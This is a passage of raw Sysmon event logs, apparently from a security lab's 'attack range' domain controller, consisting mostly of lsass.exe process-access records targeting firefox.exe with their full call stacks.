Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042611Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.507{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042610Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.507{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042609Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.507{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042608Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.507{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042607Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.507{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042606Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.506{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042605Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.506{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042604Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.506{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042603Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.506{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042602Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.506{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042601Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.506{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042600Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.506{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042599Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.505{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042598Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.505{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042597Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.505{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.505{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.504{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.504{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.504{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E48F-63C7-3106-00000000AF02}3296C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.504{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.503{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x800000000000000042590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:42.499{FE4C2B44-E48F-63C7-3106-00000000AF02}3296\chrome.3296.6.95968971C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000042589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:42.497{FE4C2B44-E48F-63C7-3106-00000000AF02}32965516C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E492-63C7-3706-00000000AF02}4504C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e86462|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+1a94a5b|C:\Program Files\Mozilla Firefox\xul.dll+1a93e85|C:\Program Files\Mozilla Firefox\xul.dll+1a968e2|C:\Program Files\Mozilla Firefox\xul.dll+17e5104|C:\Program Files\Mozilla Firefox\xul.dll+1ac03d9|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+16d888|C:\Program Files\Mozilla Firefox\xul.dll+16c717|C:\Program Files\Mozilla Firefox\xul.dll+46b6cd1|C:\Program Files\Mozilla Firefox\xul.dll+472a2ec|C:\Program Files\Mozilla Firefox\xul.dll+472b10d|C:\Program Files\Mozilla Firefox\xul.dll+20599f2|C:\Program Files\Mozilla Firefox\firefox.exe+1e99e|C:\Program Files\Mozilla 